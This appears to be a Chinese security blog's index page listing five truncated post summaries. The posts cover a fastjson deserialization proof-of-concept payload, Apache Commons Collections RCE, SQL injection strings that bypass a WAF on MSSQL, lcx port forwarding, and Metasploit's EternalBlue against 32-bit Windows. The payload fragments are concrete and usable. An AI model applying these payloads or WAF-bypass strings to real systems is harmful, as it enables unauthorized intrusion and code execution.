supdon

摘要： 一.漏洞POC fastjson<=1.2.24(CNVD-2017-02833) {"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}} fastjs 阅读全文

摘要： 1.漏洞介绍 由于使用Java InvokerTransformer类对数据进行反序列化，Apache Commons Collections可能允许远程攻击者在系统上执行任意代码。通过发送特制数据，攻击者可以利用此漏洞在系统上执行任意Java代码。 cve id：CVE-2015-7450 参考链 阅读全文

摘要： 最近渗透某个站点遇到了狗，经过千辛万苦总算绕过了，在这里分享一下过狗payload 绕过的主要方法还是加/*!*/ 这里我主要以mssql注入做测试 ​ 绕and and /*!*/1=2/*!*/ ​ 这里面我用db_name/*!*/()绕过函数 ​ 绕全局变量 /*!'*/@@version/ 阅读全文

摘要： 一、lcx使用介绍 lcx是一款端口转发工具，可以使windows/linux 的某个端口转发到其他主机，或者转发到本机的其他端口，如：将A 主机的3389 转发到B主机的1234端口，或者将A 主机的3389端口映射到A 主机的1234端口 参数如下： 1、转发端口到其他主机 lcx.exe -s 阅读全文

摘要： 前言 metasploit 自带的永恒之蓝攻击模块可以直接打windows2008 64位和win 7 64位的系统，但对于32位的系统无法直接攻击，对于windows 2003 和win10的利用需要收集命令管道或者系统账号等条件的限制 攻击windows2008 x86系统 准备ms17-010 阅读全文